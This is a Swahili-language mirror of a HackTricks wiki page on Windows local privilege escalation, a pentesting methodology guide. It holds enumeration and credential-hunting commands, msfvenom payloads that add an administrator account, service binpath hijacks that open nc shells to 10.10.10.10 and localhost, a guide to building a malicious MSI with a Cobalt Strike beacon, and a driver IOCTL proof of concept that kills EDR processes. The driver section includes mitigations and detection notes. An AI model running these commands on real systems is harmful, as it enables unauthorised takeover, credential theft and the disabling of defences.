maride/hacktricks
1
0
Fork 0
mirror of https://github.com/HackTricks-wiki/hacktricks.git synced 2025-10-10 18:36:50 +00:00
Code Issues Packages Projects Releases Wiki Activity
hacktricks/src/windows-hardening/windows-local-privilege-escalation/README.md

81 KiB
Raw Blame History

Windows Local Privilege Escalation

{{#include ../../banners/hacktricks-training.md}}

Chombo bora cha kutafuta Windows local privilege escalation vectors: WinPEAS

Msingi wa Nadharia za Windows

Access Tokens

Ikiwa haujui Windows Access Tokens ni nini, soma ukurasa ufuatao kabla ya kuendelea:

{{#ref}} access-tokens.md {{#endref}}

ACLs - DACLs/SACLs/ACEs

Tazama ukurasa ufuatao kwa maelezo zaidi kuhusu ACLs - DACLs/SACLs/ACEs:

{{#ref}} acls-dacls-sacls-aces.md {{#endref}}

Integrity Levels

Ikiwa haujui integrity levels katika Windows ni nini, unapaswa kusoma ukurasa ufuatao kabla ya kuendelea:

{{#ref}} integrity-levels.md {{#endref}}

Udhibiti wa Usalama wa Windows

Kuna mambo mbalimbali ndani ya Windows ambayo yanaweza kukuzuia kuorodhesha mfumo, kuendesha faili zinazotekelezwa au hata kutambua shughuli zako. Unapaswa kusoma ukurasa ufuatao na kuorodhesha hizi zote mbinu za ulinzi kabla ya kuanza uorodheshaji wa privilege escalation:

{{#ref}} ../authentication-credentials-uac-and-efs/ {{#endref}}

Taarifa za Mfumo

Uorodheshaji wa taarifa za toleo

Angalia ikiwa toleo la Windows lina udhaifu wowote uliotambuliwa (angalia pia patches zilizowekwa).

systeminfo
systeminfo | findstr /B /C:"OS Name" /C:"OS Version" #Get only that information
wmic qfe get Caption,Description,HotFixID,InstalledOn #Patches
wmic os get osarchitecture || echo %PROCESSOR_ARCHITECTURE% #Get system architecture

[System.Environment]::OSVersion.Version #Current OS version
Get-WmiObject -query 'select * from win32_quickfixengineering' | foreach {$_.hotfixid} #List all patches
Get-Hotfix -description "Security update" #List only "Security Update" patches

Exploits za Toleo

Tovuti hii site ni ya msaada kwa kutafuta taarifa za kina kuhusu udhaifu za usalama za Microsoft. Hifadhidata hii ina zaidi ya udhaifu 4,700 za usalama, ikionesha eneo kubwa la mashambulizi ambalo mazingira ya Windows yanaleta.

Kwenye mfumo

  • post/windows/gather/enum_patches
  • post/multi/recon/local_exploit_suggester
  • watson
  • winpeas (Winpeas ina watson imejumuishwa)

Kwenye kompyuta kwa taarifa za mfumo

Github repos za exploits:

Mazingira

Je, kuna credential/Juicy info zilizohifadhiwa katika env variables?

set
dir env:
Get-ChildItem Env: | ft Key,Value -AutoSize

Historia ya PowerShell

ConsoleHost_history #Find the PATH where is saved

type %userprofile%\AppData\Roaming\Microsoft\Windows\PowerShell\PSReadline\ConsoleHost_history.txt
type C:\Users\swissky\AppData\Roaming\Microsoft\Windows\PowerShell\PSReadline\ConsoleHost_history.txt
type $env:APPDATA\Microsoft\Windows\PowerShell\PSReadLine\ConsoleHost_history.txt
cat (Get-PSReadlineOption).HistorySavePath
cat (Get-PSReadlineOption).HistorySavePath | sls passw

Faili za Transcript za PowerShell

Unaweza kujifunza jinsi ya kuwasha hili katika https://sid-500.com/2017/11/07/powershell-enabling-transcription-logging-by-using-group-policy/

#Check is enable in the registry
reg query HKCU\Software\Policies\Microsoft\Windows\PowerShell\Transcription
reg query HKLM\Software\Policies\Microsoft\Windows\PowerShell\Transcription
reg query HKCU\Wow6432Node\Software\Policies\Microsoft\Windows\PowerShell\Transcription
reg query HKLM\Wow6432Node\Software\Policies\Microsoft\Windows\PowerShell\Transcription
dir C:\Transcripts

#Start a Transcription session
Start-Transcript -Path "C:\transcripts\transcript0.txt" -NoClobber
Stop-Transcript

PowerShell Module Logging

Maelezo ya utekelezaji wa pipeline za PowerShell yanarekodiwa, yakiwemo amri zilizotekelezwa, miito ya amri, na sehemu za skripti. Hata hivyo, maelezo kamili ya utekelezaji na matokeo ya pato yanaweza kutokukamatwa.

Ili kuwezesha hili, fuata maelekezo katika sehemu ya "Transcript files" ya nyaraka, ukichagua "Module Logging" badala ya "Powershell Transcription".

reg query HKCU\Software\Policies\Microsoft\Windows\PowerShell\ModuleLogging
reg query HKLM\Software\Policies\Microsoft\Windows\PowerShell\ModuleLogging
reg query HKCU\Wow6432Node\Software\Policies\Microsoft\Windows\PowerShell\ModuleLogging
reg query HKLM\Wow6432Node\Software\Policies\Microsoft\Windows\PowerShell\ModuleLogging

Ili kuona matukio 15 ya mwisho kutoka kwenye logi za PowersShell unaweza kutekeleza:

Get-WinEvent -LogName "windows Powershell" | select -First 15 | Out-GridView

PowerShell Script Block Logging

Rekodi kamili ya shughuli na yaliyomo yote ya utekelezaji wa script inarekodiwa, ikihakikisha kwamba kila block ya code imedokumentiwa inapotekelezwa. Mchakato huu unahifadhi rekodi ya ukaguzi kamili ya kila shughuli, muhimu kwa forensics na kuchambua tabia hatarishi. Kwa kudokumentisha shughuli zote wakati wa utekelezaji, maarifa ya kina kuhusu mchakato yanatolewa.

reg query HKCU\Software\Policies\Microsoft\Windows\PowerShell\ScriptBlockLogging
reg query HKLM\Software\Policies\Microsoft\Windows\PowerShell\ScriptBlockLogging
reg query HKCU\Wow6432Node\Software\Policies\Microsoft\Windows\PowerShell\ScriptBlockLogging
reg query HKLM\Wow6432Node\Software\Policies\Microsoft\Windows\PowerShell\ScriptBlockLogging

Matukio za logi za Script Block zinaweza kupatikana ndani ya Windows Event Viewer kwenye njia: Application and Services Logs > Microsoft > Windows > PowerShell > Operational.
Ili kuona matukio 20 ya mwisho unaweza kutumia:

Get-WinEvent -LogName "Microsoft-Windows-Powershell/Operational" | select -first 20 | Out-Gridview

Mipangilio ya Intaneti

reg query "HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings"
reg query "HKLM\Software\Microsoft\Windows\CurrentVersion\Internet Settings"

Diski

wmic logicaldisk get caption || fsutil fsinfo drives
wmic logicaldisk get caption,description,providername
Get-PSDrive | where {$_.Provider -like "Microsoft.PowerShell.Core\FileSystem"}| ft Name,Root

WSUS

Unaweza compromise mfumo ikiwa masasisho yataombwa si kwa httpS bali kwa http.

Unaanza kwa kukagua ikiwa mtandao unatumia non-SSL WSUS update kwa kuendesha amri ifuatayo katika cmd:

reg query HKLM\Software\Policies\Microsoft\Windows\WindowsUpdate /v WUServer

Au yafuatayo katika PowerShell:

Get-ItemProperty -Path HKLM:\Software\Policies\Microsoft\Windows\WindowsUpdate -Name "WUServer"

Ikiwa utapata jibu kama moja ya hizi:

HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\WindowsUpdate
WUServer    REG_SZ    http://xxxx-updxx.corp.internal.com:8535

WUServer     : http://xxxx-updxx.corp.internal.com:8530
PSPath       : Microsoft.PowerShell.Core\Registry::HKEY_LOCAL_MACHINE\software\policies\microsoft\windows\windowsupdate
PSParentPath : Microsoft.PowerShell.Core\Registry::HKEY_LOCAL_MACHINE\software\policies\microsoft\windows
PSChildName  : windowsupdate
PSDrive      : HKLM
PSProvider   : Microsoft.PowerShell.Core\Registry

And if HKLM\Software\Policies\Microsoft\Windows\WindowsUpdate\AU /v UseWUServer or Get-ItemProperty -Path hklm:\software\policies\microsoft\windows\windowsupdate\au -name "usewuserver" is equals to 1.

Basi, inaweza kutumiwa. Ikiwa registry ya mwisho ni sawa na 0, basi kipengee cha WSUS kitatupwa.

Ili kutekeleza udhaifu huu unaweza kutumia zana kama: Wsuxploit, pyWSUS - Hizi ni script za MiTM zilizotumiwa kama exploits ili kuingiza masasisho 'bandia' ndani ya trafiki ya WSUS isiyo ya SSL.

Read the research here:

{{#file}} CTX_WSUSpect_White_Paper (1).pdf {{#endfile}}

WSUS CVE-2020-1013

Read the complete report here.
Kwa ujumla, hili ndilo dosari ambayo mdudu huyu unaitumia:

If we have the power to modify our local user proxy, and Windows Updates uses the proxy configured in Internet Explorers settings, we therefore have the power to run PyWSUS locally to intercept our own traffic and run code as an elevated user on our asset.

Furthermore, since the WSUS service uses the current users settings, it will also use its certificate store. If we generate a self-signed certificate for the WSUS hostname and add this certificate into the current users certificate store, we will be able to intercept both HTTP and HTTPS WSUS traffic. WSUS uses no HSTS-like mechanisms to implement a trust-on-first-use type validation on the certificate. If the certificate presented is trusted by the user and has the correct hostname, it will be accepted by the service.

Unaweza kutekeleza udhaifu huu kwa kutumia zana WSUSpicious (mara itakaporemolewa).

Third-Party Auto-Updaters and Agent IPC (local privesc)

Wakala wengi wa kampuni hufungua uso wa localhost IPC na chaneli ya masasisho yenye heshima. Ikiwa usajili unaweza kusukumwa kwenda kwenye server ya mshambuliaji na updater inamtumaini rogue root CA au ukaguzi dhaifu wa signer, mtumiaji wa ndani anaweza kusambaza MSI yenye madhara ambayo huduma ya SYSTEM itaweka. Tazama mbinu jumla (inayotokana na Netskope stAgentSvc chain CVE-2025-0309) hapa:

{{#ref}} abusing-auto-updaters-and-ipc.md {{#endref}}

KrbRelayUp

Kuna udhaifu wa local privilege escalation katika mazingira ya Windows domain chini ya masharti maalum. Masharti haya ni pamoja na mazingira ambapo LDAP signing haifuatwi, watumiaji wana haki za kujipatia wenyewe kusanidi Resource-Based Constrained Delegation (RBCD), na uwezo wa watumiaji kuunda computers ndani ya domain. Ni muhimu kutambua kwamba mahitaji haya yanatimizwa kwa kutumia default settings.

Find the exploit in https://github.com/Dec0ne/KrbRelayUp

Kwa maelezo zaidi kuhusu mtiririko wa shambulio angalia https://research.nccgroup.com/2019/08/20/kerberos-resource-based-constrained-delegation-when-an-image-change-leads-to-a-privilege-escalation/

AlwaysInstallElevated

If rejista hizi 2 ziko enabled (value ni 0x1), basi watumiaji wa kiwango chochote cha ruhusa wanaweza install (kuitekeleza) *.msi files kama NT AUTHORITY\SYSTEM.

reg query HKCU\SOFTWARE\Policies\Microsoft\Windows\Installer /v AlwaysInstallElevated
reg query HKLM\SOFTWARE\Policies\Microsoft\Windows\Installer /v AlwaysInstallElevated

Metasploit payloads

msfvenom -p windows/adduser USER=rottenadmin PASS=P@ssword123! -f msi-nouac -o alwe.msi #No uac format
msfvenom -p windows/adduser USER=rottenadmin PASS=P@ssword123! -f msi -o alwe.msi #Using the msiexec the uac wont be prompted

Ikiwa una kikao cha meterpreter unaweza kuendesha mbinu hii kiotomatiki ukitumia module exploit/windows/local/always_install_elevated

PowerUP

Tumia amri Write-UserAddMSI kutoka power-up kuunda ndani ya saraka ya sasa Windows MSI binary ili kuongeza viwango vya ruhusa. Skripti hii inaandika installer ya MSI iliyotangulia kutengenezwa ambayo inauliza kuongeza user/group (hivyo utahitaji GIU access):

Write-UserAddMSI

Tekeleza tu binari iliyotengenezwa ili kupandisha ruhusa.

MSI Wrapper

Soma mafunzo haya ili kujifunza jinsi ya kuunda MSI wrapper kwa kutumia zana hizi. Kumbuka unaweza kufunga faili ".bat" ikiwa unataka tu execute command lines

{{#ref}} msi-wrapper.md {{#endref}}

Create MSI with WIX

{{#ref}} create-msi-with-wix.md {{#endref}}

Create MSI with Visual Studio

  • Tengeneza kwa kutumia Cobalt Strike au Metasploit new Windows EXE TCP payload na uiweke katika C:\privesc\beacon.exe
  • Fungua Visual Studio, chagua Create a new project na andika "installer" kwenye kisanduku cha utafutaji. Chagua mradi wa Setup Wizard na bonyeza Next.
  • Mpa mradi jina, kama AlwaysPrivesc, tumia C:\privesc kama eneo, chagua place solution and project in the same directory, kisha bonyeza Create.
  • Endelea kubonyeza Next hadi ufike hatua ya 3 ya 4 (chagua faili za kujumuisha). Bonyeza Add na chagua Beacon payload uliyotengeneza. Kisha bonyeza Finish.
  • Chagua mradi AlwaysPrivesc katika Solution Explorer na katika Properties, badilisha TargetPlatform kutoka x86 hadi x64.
  • Kuna properties nyingine unaweza kubadilisha, kama Author na Manufacturer ambazo zinaweza kufanya app iliyosakinishwa ionekane halali zaidi.
  • Bonyeza kulia kwenye mradi na chagua View > Custom Actions.
  • Bonyeza kulia Install na chagua Add Custom Action.
  • Bonyeza mara mbili kwenye Application Folder, chagua faili yako beacon.exe na bonyeza OK. Hii itahakikisha kuwa beacon payload itatekelezwa mara installer inapoendeshwa.
  • Chini ya Custom Action Properties, badilisha Run64Bit kuwa True.
  • Mwishowe, build it.
  • Ikiwa onyo File 'beacon-tcp.exe' targeting 'x64' is not compatible with the project's target platform 'x86' linaonekana, hakikisha umeweka platform kuwa x64.

MSI Installation

Ili kutekeleza installation ya faili ya .msi ya hasidi kwa background:

msiexec /quiet /qn /i C:\Users\Steve.INFERNO\Downloads\alwe.msi

Ili kufanya exploit kwa udhaifu huu, unaweza kutumia: exploit/windows/local/always_install_elevated

Antivirus na Vigunduzi

Mipangilio ya Ukaguzi

Mipangilio haya yanaamua nini kina logged, hivyo unapaswa kulipa umakini

reg query HKLM\Software\Microsoft\Windows\CurrentVersion\Policies\System\Audit

WEF

Windows Event Forwarding, ni muhimu kujua logs zimepelekwa wapi

reg query HKLM\Software\Policies\Microsoft\Windows\EventLog\EventForwarding\SubscriptionManager

LAPS

LAPS imeundwa kwa ajili ya usimamizi wa local Administrator passwords, kuhakikisha kwamba kila password ni unique, randomised, na inasasishwa mara kwa mara kwenye kompyuta zilizojiunga na domain. Password hizi zinahifadhiwa kwa usalama ndani ya Active Directory na zinaweza kufikiwa tu na watumiaji ambao wamepewa ruhusa za kutosha kupitia ACLs, zinazowawezesha kuona local admin passwords ikiwa wameidhinishwa.

{{#ref}} ../active-directory-methodology/laps.md {{#endref}}

WDigest

Ikiwa imewezeshwa, plain-text passwords are stored in LSASS (Local Security Authority Subsystem Service).
More info about WDigest in this page.

reg query 'HKLM\SYSTEM\CurrentControlSet\Control\SecurityProviders\WDigest' /v UseLogonCredential

LSA Protection

Kuanzia na Windows 8.1, Microsoft iliweka ulinzi ulioboreshwa kwa Local Security Authority (LSA) ili kuzuia jaribio la michakato isiyoaminika kusoma kumbukumbu yake au kuingiza msimbo, na hivyo kuimarisha usalama wa mfumo.
Maelezo zaidi kuhusu LSA Protection hapa.

reg query 'HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\LSA' /v RunAsPPL

Credentials Guard

Credential Guard ilianzishwa katika Windows 10. Kusudi lake ni kulinda credentials zilizohifadhiwa kwenye kifaa dhidi ya vitisho kama vile pass-the-hash attacks.| More info about Credentials Guard here.

reg query 'HKLM\System\CurrentControlSet\Control\LSA' /v LsaCfgFlags

Cached Credentials

Domain credentials zinathibitishwa na Local Security Authority (LSA) na zinatumiwa na vipengele vya mfumo wa uendeshaji. Wakati data ya kuingia ya mtumiaji inathibitishwa na kifurushi cha usalama kilichosajiliwa, domain credentials kwa mtumiaji kwa kawaida huanzishwa.
Maelezo zaidi kuhusu Cached Credentials hapa.

reg query "HKEY_LOCAL_MACHINE\SOFTWARE\MICROSOFT\WINDOWS NT\CURRENTVERSION\WINLOGON" /v CACHEDLOGONSCOUNT

Watumiaji & Vikundi

Orodhesha Watumiaji & Vikundi

Unapaswa kuangalia ikiwa kuna vikundi unavyomo vinavyokuwa na ruhusa za kuvutia

# CMD
net users %username% #Me
net users #All local users
net localgroup #Groups
net localgroup Administrators #Who is inside Administrators group
whoami /all #Check the privileges

# PS
Get-WmiObject -Class Win32_UserAccount
Get-LocalUser | ft Name,Enabled,LastLogon
Get-ChildItem C:\Users -Force | select Name
Get-LocalGroupMember Administrators | ft Name, PrincipalSource

Makundi yenye vibali maalum

Ikiwa wewe uko katika kundi lenye vibali maalum, unaweza kupandisha vibali. Jifunze kuhusu makundi yenye vibali maalum na jinsi ya kuyatumia vibaya ili kupandisha vibali hapa:

{{#ref}} ../active-directory-methodology/privileged-groups-and-token-privileges.md {{#endref}}

Token manipulation

Jifunze zaidi kuhusu ni token ni nini katika ukurasa huu: Windows Tokens.
Angalia ukurasa ufuatao ili ujifunze kuhusu token za kuvutia na jinsi ya kuzitumia vibaya:

{{#ref}} privilege-escalation-abusing-tokens.md {{#endref}}

Watumiaji waliingia / Vikao

qwinsta
klist sessions

Folda za nyumbani

dir C:\Users
Get-ChildItem C:\Users

Sera ya Nywila

net accounts

Pata yaliyomo kwenye clipboard

powershell -command "Get-Clipboard"

Michakato Inayoendelea

Ruhusa za Faili na Folda

Kwanza kabisa, unaporodhesha michakato angalia nywila ndani ya mstari wa amri wa mchakato.
Angalia kama unaweza kuandika juu ya binary fulani inayokimbia au kama una ruhusa za kuandika kwenye folda ya binary ili kutumia uwezekano wa DLL Hijacking attacks:

Tasklist /SVC #List processes running and services
tasklist /v /fi "username eq system" #Filter "system" processes

#With allowed Usernames
Get-WmiObject -Query "Select * from Win32_Process" | where {$_.Name -notlike "svchost*"} | Select Name, Handle, @{Label="Owner";Expression={$_.GetOwner().User}} | ft -AutoSize

#Without usernames
Get-Process | where {$_.ProcessName -notlike "svchost*"} | ft ProcessName, Id

Daima angalia uwezekano wa electron/cef/chromium debuggers running, you could abuse it to escalate privileges.

Kuangalia ruhusa za binaries za michakato

for /f "tokens=2 delims='='" %%x in ('wmic process list full^|find /i "executablepath"^|find /i /v "system32"^|find ":"') do (
for /f eol^=^"^ delims^=^" %%z in ('echo %%x') do (
icacls "%%z"
2>nul | findstr /i "(F) (M) (W) :\\" | findstr /i ":\\ everyone authenticated users todos %username%" && echo.
)
)

Kukagua ruhusa za mafolda ya processes binaries (DLL Hijacking)

for /f "tokens=2 delims='='" %%x in ('wmic process list full^|find /i "executablepath"^|find /i /v
"system32"^|find ":"') do for /f eol^=^"^ delims^=^" %%y in ('echo %%x') do (
icacls "%%~dpy\" 2>nul | findstr /i "(F) (M) (W) :\\" | findstr /i ":\\ everyone authenticated users
todos %username%" && echo.
)

Memory Password mining

Unaweza kuunda memory dump ya mchakato unaoendesha kwa kutumia procdump kutoka sysinternals. Huduma kama FTP zina credentials in clear text in memory, jaribu kufanya dump ya memory na kusoma credentials.

procdump.exe -accepteula -ma <proc_name_tasklist>

Programu za GUI zisizo salama

Programu zinazotendewa kama SYSTEM zinaweza kumruhusu mtumiaji kuanzisha CMD, au kuvinjari saraka.

Kwa mfano: "Windows Help and Support" (Windows + F1), tafuta "command prompt", bonyeza "Click to open Command Prompt"

Huduma

Pata orodha ya huduma:

net start
wmic service list brief
sc query
Get-Service

Ruhusa

Unaweza kutumia sc kupata taarifa za huduma

sc qc <service_name>

Inashauriwa kuwa na binary accesschk kutoka kwa Sysinternals ili kuangalia kiwango cha ruhusa kinachohitajika kwa kila huduma.

accesschk.exe -ucqv <Service_Name> #Check rights for different groups

Inashauriwa kuangalia ikiwa "Authenticated Users" wanaweza kubadilisha huduma yoyote:

accesschk.exe -uwcqv "Authenticated Users" * /accepteula
accesschk.exe -uwcqv %USERNAME% * /accepteula
accesschk.exe -uwcqv "BUILTIN\Users" * /accepteula 2>nul
accesschk.exe -uwcqv "Todos" * /accepteula ::Spanish version

Unaweza kupakua accesschk.exe ya XP hapa

Washa huduma

Ikiwa unapata kosa hili (kwa mfano na SSDPSRV):

System error 1058 imejitokeza.
Huduma haiwezi kuanzishwa, ama kwa sababu imezimwa au kwa sababu haina vifaa vilivyowezeshwa vinavyohusishwa nayo.

Unaweza kuiwezesha kwa kutumia

sc config SSDPSRV start= demand
sc config SSDPSRV obj= ".\LocalSystem" password= ""

Chukulia kwamba huduma upnphost inategemea SSDPSRV ili kufanya kazi (kwa XP SP1)

Njia mbadala nyingine ya tatizo hili ni kuendesha:

sc.exe config usosvc start= auto

Badilisha njia ya binary ya huduma

Katika hali ambapo kikundi "Authenticated users" kinamiliki SERVICE_ALL_ACCESS kwenye huduma, inawezekana kubadilisha binary inayotekelezwa ya huduma. Ili kubadilisha na kutekeleza sc:

sc config <Service_Name> binpath= "C:\nc.exe -nv 127.0.0.1 9988 -e C:\WINDOWS\System32\cmd.exe"
sc config <Service_Name> binpath= "net localgroup administrators username /add"
sc config <Service_Name> binpath= "cmd \c C:\Users\nc.exe 10.10.10.10 4444 -e cmd.exe"

sc config SSDPSRV binpath= "C:\Documents and Settings\PEPE\meter443.exe"

Anzisha upya huduma

wmic service NAMEOFSERVICE call startservice
net stop [service name] && net start [service name]

Madaraka yanaweza kupandishwa kupitia ruhusa zifuatazo:

  • SERVICE_CHANGE_CONFIG: Inaruhusu kurekebisha service binary.
  • WRITE_DAC: Inaruhusu kurekebisha ruhusa, na hivyo kuwezesha kubadilisha usanidi za service.
  • WRITE_OWNER: Inaruhusu kupata umiliki na kurekebisha ruhusa.
  • GENERIC_WRITE: Inarithi uwezo wa kubadilisha usanidi za service.
  • GENERIC_ALL: Pia inarithi uwezo wa kubadilisha usanidi za service.

Kwa ajili ya detection na exploitation ya udhaifu huu, exploit/windows/local/service_permissions inaweza kutumika.

Ruhusa dhaifu za service binaries

Angalia kama unaweza kubadilisha binary inayotekelezwa na service au kama una write permissions on the folder where the binary is located (DLL Hijacking).
Unaweza kupata kila binary inayotekelezwa na service kwa kutumia wmic (not in system32) na kukagua ruhusa zako kwa kutumia icacls:

for /f "tokens=2 delims='='" %a in ('wmic service list full^|find /i "pathname"^|find /i /v "system32"') do @echo %a >> %temp%\perm.txt

for /f eol^=^"^ delims^=^" %a in (%temp%\perm.txt) do cmd.exe /c icacls "%a" 2>nul | findstr "(M) (F) :\"

Unaweza pia kutumia sc na icacls:

sc query state= all | findstr "SERVICE_NAME:" >> C:\Temp\Servicenames.txt
FOR /F "tokens=2 delims= " %i in (C:\Temp\Servicenames.txt) DO @echo %i >> C:\Temp\services.txt
FOR /F %i in (C:\Temp\services.txt) DO @sc qc %i | findstr "BINARY_PATH_NAME" >> C:\Temp\path.txt

Ruhusa za kubadilisha rejista ya huduma

Unapaswa kuangalia ikiwa unaweza kubadilisha rejista yoyote ya huduma.
Unaweza kuangalia ruhusa zako juu ya rejista ya huduma kwa kufanya:

reg query hklm\System\CurrentControlSet\Services /s /v imagepath #Get the binary paths of the services

#Try to write every service with its current content (to check if you have write permissions)
for /f %a in ('reg query hklm\system\currentcontrolset\services') do del %temp%\reg.hiv 2>nul & reg save %a %temp%\reg.hiv 2>nul && reg restore %a %temp%\reg.hiv 2>nul && echo You can modify %a

get-acl HKLM:\System\CurrentControlSet\services\* | Format-List * | findstr /i "<Username> Users Path Everyone"

Inapaswa kuangaliwa ikiwa Authenticated Users au NT AUTHORITY\INTERACTIVE wanamiliki ruhusa za FullControl. Ikiwa ni hivyo, binary inayotekelezwa na huduma inaweza kubadilishwa.

Ili kubadili Path ya binary inayotekelezwa:

reg add HKLM\SYSTEM\CurrentControlSet\services\<service_name> /v ImagePath /t REG_EXPAND_SZ /d C:\path\new\binary /f

Ruhusa za AppendData/AddSubdirectory kwenye rejista ya Services

Ikiwa una ruhusa hii juu ya rejista, hii inamaanisha unaweza kuunda rejista ndogo kutoka kwa hii. Kwa huduma za Windows hii ni ya kutosha kutekeleza msimbo wowote:

{{#ref}} appenddata-addsubdirectory-permission-over-service-registry.md {{#endref}}

Njia za Service zisizo na nukuu

Ikiwa njia ya executable haiko ndani ya nukuu, Windows itajaribu kutekeleza kila sehemu kabla ya nafasi.

Kwa mfano, kwa njia C:\Program Files\Some Folder\Service.exe Windows itajaribu kutekeleza:

C:\Program.exe
C:\Program Files\Some.exe
C:\Program Files\Some Folder\Service.exe

Orodhesha njia zote za huduma ambazo hazijowekwa kwa nukuu, isipokuwa zile zinazomilikiwa na huduma za asili za Windows:

wmic service get name,pathname,displayname,startmode | findstr /i auto | findstr /i /v "C:\Windows\\" | findstr /i /v '\"'
wmic service get name,displayname,pathname,startmode | findstr /i /v "C:\\Windows\\system32\\" |findstr /i /v '\"'  # Not only auto services

# Using PowerUp.ps1
Get-ServiceUnquoted -Verbose

for /f "tokens=2" %%n in ('sc query state^= all^| findstr SERVICE_NAME') do (
for /f "delims=: tokens=1*" %%r in ('sc qc "%%~n" ^| findstr BINARY_PATH_NAME ^| findstr /i /v /l /c:"c:\windows\system32" ^| findstr /v /c:""""') do (
echo %%~s | findstr /r /c:"[a-Z][ ][a-Z]" >nul 2>&1 && (echo %%n && echo %%~s && icacls %%s | findstr /i "(F) (M) (W) :\" | findstr /i ":\\ everyone authenticated users todos %username%") && echo.
)
)

gwmi -class Win32_Service -Property Name, DisplayName, PathName, StartMode | Where {$_.StartMode -eq "Auto" -and $_.PathName -notlike "C:\Windows*" -and $_.PathName -notlike '"*'} | select PathName,DisplayName,Name

Unaweza kugundua na exploit udhaifu huu kwa metasploit: exploit/windows/local/trusted\_service\_path Unaweza kuunda kwa mikono binary ya huduma kwa metasploit:

msfvenom -p windows/exec CMD="net localgroup administrators username /add" -f exe-service -o service.exe

Hatua za Urejesho

Windows inaruhusu watumiaji kubainisha hatua zitakazochukuliwa ikiwa service itashindwa. Kipengele hiki kinaweza kusanidiwa kuelekeza kwa binary. Ikiwa binary hii inaweza kubadilishwa, privilege escalation inaweza kuwa inawezekana. Maelezo zaidi yanaweza kupatikana katika official documentation.

Programu

Programu Zilizowekwa

Kagua idhini za binaries (labda unaweza kuandika juu ya moja na kufanikisha privilege escalation) na za folda (DLL Hijacking).

dir /a "C:\Program Files"
dir /a "C:\Program Files (x86)"
reg query HKEY_LOCAL_MACHINE\SOFTWARE

Get-ChildItem 'C:\Program Files', 'C:\Program Files (x86)' | ft Parent,Name,LastWriteTime
Get-ChildItem -path Registry::HKEY_LOCAL_MACHINE\SOFTWARE | ft Name

Idhini za Kuandika

Angalia kama unaweza kubadilisha faili ya config ili kusoma faili maalum au kama unaweza kubadilisha binary ambayo itatekelezwa na Administrator account (schedtasks).

Njia ya kutafuta ruhusa dhaifu za folda/faili kwenye mfumo ni kufanya:

accesschk.exe /accepteula
# Find all weak folder permissions per drive.
accesschk.exe -uwdqs Users c:\
accesschk.exe -uwdqs "Authenticated Users" c:\
accesschk.exe -uwdqs "Everyone" c:\
# Find all weak file permissions per drive.
accesschk.exe -uwqs Users c:\*.*
accesschk.exe -uwqs "Authenticated Users" c:\*.*
accesschk.exe -uwdqs "Everyone" c:\*.*

icacls "C:\Program Files\*" 2>nul | findstr "(F) (M) :\" | findstr ":\ everyone authenticated users todos %username%"
icacls ":\Program Files (x86)\*" 2>nul | findstr "(F) (M) C:\" | findstr ":\ everyone authenticated users todos %username%"

Get-ChildItem 'C:\Program Files\*','C:\Program Files (x86)\*' | % { try { Get-Acl $_ -EA SilentlyContinue | Where {($_.Access|select -ExpandProperty IdentityReference) -match 'Everyone'} } catch {}}

Get-ChildItem 'C:\Program Files\*','C:\Program Files (x86)\*' | % { try { Get-Acl $_ -EA SilentlyContinue | Where {($_.Access|select -ExpandProperty IdentityReference) -match 'BUILTIN\Users'} } catch {}}

Endesha wakati wa kuanzisha

Angalia kama unaweza kuandika upya registry au binary ambayo itatekelezwa na mtumiaji mwingine.
Soma ukurasa ufuatao ili ujifunze zaidi kuhusu maeneo ya kuvutia ya autoruns ili escalate privileges:

{{#ref}} privilege-escalation-with-autorun-binaries.md {{#endref}}

Drivers

Tafuta drivers za wa tatu zisizo za kawaida/vulnerable

driverquery
driverquery.exe /fo table
driverquery /SI

If a driver exposes an arbitrary kernel read/write primitive (common in poorly designed IOCTL handlers), you can escalate by stealing a SYSTEM token directly from kernel memory. See the stepbystep technique here:

{{#ref}} arbitrary-kernel-rw-token-theft.md {{#endref}}

Kunyanyasa ukosefu wa FILE_DEVICE_SECURE_OPEN kwenye device objects (LPE + EDR kill)

Baadhi ya signed thirdparty drivers huunda device object yao kwa SDDL imara kupitia IoCreateDeviceSecure lakini hukosa kuweka FILE_DEVICE_SECURE_OPEN katika DeviceCharacteristics. Bila bendera hii, secure DACL haitekelezwi wakati device inafunguliwa kupitia path inayojumuisha sehemu ya ziada, ikiruhusu mtumiaji asiye na idhini kupata handle kwa kutumia namespace path kama:

  • \.\DeviceName\anything
  • \.\amsdk\anyfile (from a real-world case)

Mara mtumiaji anapoweza kufungua device, privileged IOCTLs exposed by the driver zinaweza kutumiwa vibaya kwa LPE na kuharibu. Mifano ya uwezo ulioonekana kwa vitendo:

  • Kurudisha handles za full-access kwa arbitrary processes (token theft / SYSTEM shell via DuplicateTokenEx/CreateProcessAsUser).
  • Unrestricted raw disk read/write (offline tampering, boot-time persistence tricks).
  • Terminate arbitrary processes, including Protected Process/Light (PP/PPL), allowing AV/EDR kill from user land via kernel.

Mfano mdogo wa PoC (user mode):

// Example based on a vulnerable antimalware driver
#define IOCTL_REGISTER_PROCESS  0x80002010
#define IOCTL_TERMINATE_PROCESS 0x80002048

HANDLE h = CreateFileA("\\\\.\\amsdk\\anyfile", GENERIC_READ|GENERIC_WRITE, 0, 0, OPEN_EXISTING, 0, 0);
DWORD me = GetCurrentProcessId();
DWORD target = /* PID to kill or open */;
DeviceIoControl(h, IOCTL_REGISTER_PROCESS,  &me,     sizeof(me),     0, 0, 0, 0);
DeviceIoControl(h, IOCTL_TERMINATE_PROCESS, &target, sizeof(target), 0, 0, 0, 0);

Mikakati ya kuzuia kwa watengenezaji

  • Daima weka FILE_DEVICE_SECURE_OPEN wakati wa kuunda device objects zilizokusudiwa kudhibitiwa na DACL.
  • Thibitisha muktadha wa muombaji kwa operesheni zenye ruhusa za juu. Ongeza PP/PPL checks kabla ya kuruhusu process termination au handle returns.
  • Weka vizingiti kwa IOCTLs (access masks, METHOD_*, input validation) na fikiria brokered models badala ya ruhusa za moja kwa moja za kernel.

Mbinu za utambuzi kwa watetezi

  • Fuatilia ufunguzi wa user-mode wa majina ya device yanayoshukiwa (e.g., \ .\amsdk*) na mfuatano maalum wa IOCTL unaoashiria matumizi mabaya.
  • Tekeleza Microsofts vulnerable driver blocklist (HVCI/WDAC/Smart App Control) na udumishie orodha zako za allow/deny.

PATH DLL Hijacking

Ikiwa una write permissions inside a folder present on PATH unaweza kuweza hijack DLL inayopakiwa na process na escalate privileges.

Angalia ruhusa za folda zote ndani ya PATH:

